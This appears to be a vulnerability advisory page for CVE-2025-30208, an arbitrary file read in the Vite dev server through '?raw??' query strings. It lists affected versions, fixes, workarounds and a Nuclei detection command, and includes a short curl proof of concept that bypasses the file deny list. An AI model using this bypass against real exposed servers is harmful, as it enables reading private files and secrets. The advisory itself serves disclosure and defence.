CVE-2025-30208 is a medium-severity (CVSS 5.3) Information Exposure vulnerability in vite. 11 public exploit or proof-of-concept references are indexed, so weaponization risk is real. A fix is available for vite — see the affected versions and patch details below.
Vite bypasses server.fs.deny when using `?raw??`
Exploitation Status
Proof-of-concept exploit code exists
- CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
Exploitation and automatability from CISA’s SSVC triage for CVE-2025-30208.
EPSS Exploitation Probability
Probability of exploitation in the next 30 days, from FIRST.org EPSS.
How urgent is this, really
Where this sits among everything scored
Real-World Exposure
How broadly this vulnerability is actually deployed: weekly install volume shows current usage, and reverse-dependency count shows how many other packages break if it stays unpatched.
vitenpmDescription
Summary
The contents of arbitrary files can be returned to the browser.
Impact
Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.
Details
@fs denies access to files outside of Vite serving allow list. Adding ?raw?? or ?import&raw?? to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as ? are removed in several places, but are not accounted for in query string regexes.
PoC
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt
# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
<body>
<h1>403 Restricted</h1>
<p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | vite | ≥ 6.2.0&&< 6.2.3 | 6.2.3npm install vite@6.2.3 |
| 📦npm | vite | ≥ 6.1.0&&< 6.1.2 | 6.1.2npm install vite@6.1.2 |
| 📦npm | vite | ≥ 6.0.0&&< 6.0.12 | 6.0.12npm install vite@6.0.12 |
| 📦npm | vite | ≥ 5.0.0&&< 5.4.15 | 5.4.15npm install vite@5.4.15 |
| 📦npm | vite | all versions | 4.5.10npm install vite@4.5.10 |
Affected Products
vitevitejsResearch use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.
Vite 6.2.2 - Arbitrary File Read
by 4m3rr0r · Apr 3, 2025
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for vite, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.
Fix
Update vite to 6.2.3 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2025-30208 is resolved across your whole dependency graph.
Workarounds
Put an independent control in front of the weakness: restrict the affected endpoint or interface to trusted networks, require an additional authentication factor or proxy-level check, and invalidate existing sessions and credentials in case the flaw has already been used.
How to detect CVE-2025-30208
A community-maintained Nuclei template exists for this CVE. You can scan for it directly:
nuclei -id cve-2025-30208 -u https://target- Template
- Vite - Arbitrary File Read
- Severity
- medium
- Impact
- Attackers can bypass file access restrictions by adding special query parameters to URLs, potentially reading arbitrary files when the Vite dev server is exposed to the network.
- Remediation
- Upgrade to Vite version 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10 that properly validates query parameters.
Template by ProjectDiscovery nuclei-templates (v2htw, s4e-io), MIT licensed. View the full template. Scan only systems you are authorised to test.
Frequently Asked Questions
Is CVE-2025-30208 in your dependencies?
Find it across npm, including transitive dependencies.